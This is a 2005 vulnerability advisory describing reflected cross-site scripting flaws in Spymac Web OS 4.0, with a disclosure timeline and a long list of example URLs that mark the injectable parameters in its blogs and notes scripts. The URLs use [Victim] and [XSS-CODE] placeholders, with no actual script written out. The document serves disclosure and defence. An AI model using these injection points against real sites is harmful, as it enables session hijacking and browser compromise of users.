spymacXSS.txt

`#####################################################  
Spymac Web OS v4 blogs and notes multiple variable XSS  
Vendor url: http://www.spymac.com &  
http://arnieshwartz.spymac.com/the_spymac_web_os.htm  
Advisore: http://lostmon.blogspot.com/2005/11/  
spymac-web-os-v4-blogs-and-notes.html  
Vendor notify :yes exploit available: yes  
#####################################################  
  
  
Spymac is powered by an integrated collection of applications  
(developed in-house)that together form "Spymac WOS". Spymac  
WOS is an intelligent environment featuring patent-pending  
technology that allows for the creation of an immersive and  
visually-stunning Web experience.  
  
Spymac have a flaw that allows a remote cross site scripting attack.  
This flaw exists because the application does not validate  
multiple variables upon submission to multiple scripts.  
This could allow a user to create a specially crafted URL  
that would execute arbitrary code in a user's browser within  
the trust relationship between the browser and the server,  
leading to a loss of integrity.  
  
  
################  
VERSIONS  
################  
  
Spymac Web Os 4.0  
  
#########  
Solution  
#########  
  
No solution at this time  
  
##########  
timeline  
##########  
  
Discovered : 28 10 2005  
Vendor notify: 02 11 2005  
Vendor response:  
Disclosure : 04-11-2005  
  
  
###################  
EXAMPLES#  
###################  
  
For exploit some vulns, you need to login.  
  
###########  
IN BLOGS  
###########  
  
http://[Victim]/blogs/index.php?curr=349030[XSS-CODE]  
  
http://[Victim]/blogs/blog_newentry.php?inspire=134403[XSS-CODE]  
&system=blogentries&title=Blogs%20now%20online  
  
http://[Victim]/blogs/blog_newentry.php?inspire=134403&system=  
blogentries[XSS-CODE]&title=Blogs%20now%20online  
  
http://[Victim]/blogs/blog_newentry.php?inspire=134403&system=  
blogentries&title=Blogs%20now%20online[XSS-CODE]  
  
http://[Victim]/blogs/blog_newentry_comment.php?entry=113733[XSS-CODE]  
  
http://[Victim]/blogs/blog.php?pageid=113733&caldate=1128146400[XSS-CODE]  
  
http://[Victim]/blogs/blog_edit_entry.php?entry=113733[XSS-CODE]  
  
http://[Victim]/blogs/blog.php?pageid=260&label=Cool%20Stuff  
&caldate=1128146400[XSS-CODE]  
  
###########  
IN NOTES  
###########  
  
http://[Victim]/notes/index.php?action=noteform&forwardid=469397[XSS-CODE]  
http://[victim]/notes/index.php?action=delete_folder&del_folder=qq[XSS-CODE]  
http://[Victim]/notes/index.php?curr=100&isread=asc[XSS-CODE]  
http://[victim]/notes/index.php?curr=100&dateorder=asc[XSS-CODE]  
http://[victim]/notes/index.php?curr=100&subjectorder=asc[XSS-CODE]  
http://[victim]/notes/index.php?curr=100[XSS-CODE]  
http://[victim]/notes/index.php?isread=asc[XSS-CODE]  
http://[Victim]/notes/index.php?fromorder=asc[XSS-CODE]  
http://[Victim]/notes/index.php?fromorder=asc&action=search_title[XSS-CODE]  
http://[Victim]/notes/index.php?action=shownote&noteid=243633[XSS-CODE]  
http://[Victim]/notes/index.php?action=noteform[XSS-CODE]&replyid=243633  
http://[Victim]/notes/index.php?action=Inbox[XSS-CODE]  
http://[Victim]/notes/index.php?totalnotes=&ppp=10&ppp=40[XSS-CODE]&action=Inbox  
http://[Victim]/notes/index.php?totalnotes=[XSS-CODE]&ppp=10&ppp=30  
http://[Victim]/notes/index.php?totalnotes=&ppp=10&ppp=40&totalreplies=asc[XSS-CODE]&action=Inbox  
http://[Victim]/notes/index.php?action=noteform&touserid=172195[XSS-CODE]  
  
######################## €nd #########################  
  
thnx to estrella to be my ligth  
  
--  
atentamente:  
Lostmon ([email protected])  
Web-Blog: http://lostmon.blogspot.com/  
--  
La curiosidad es lo que hace mover la mente....  
`